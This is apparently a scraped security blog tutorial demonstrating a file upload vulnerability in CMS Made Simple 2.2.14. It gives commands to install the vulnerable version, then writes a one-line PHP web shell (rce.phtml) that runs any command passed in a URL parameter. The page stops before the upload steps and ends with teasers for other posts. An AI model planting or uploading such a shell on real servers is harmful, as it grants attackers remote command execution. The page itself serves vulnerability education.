Hey Folks, In this tutorial we will show you the (POC) of cms made simple 2.2.14 which is vulnerable to arbitrary file upload vulnerability. This vulnerability allow an authenticated user to upload arbitrary file on the file manager.
wget http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
sudo unzip cmsms-2.2.14-install.zip -d /var/www/html/cmsms
sudo chmod -R 755 /var/www/html/cmsms/
sudo chown -R www-data:www-data /var/www/html/cmsms/
systemctl start apache2
cat > rce.phtml
<?php system($_GET['cmd']);?>
The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…
Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…
Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
This website uses cookies.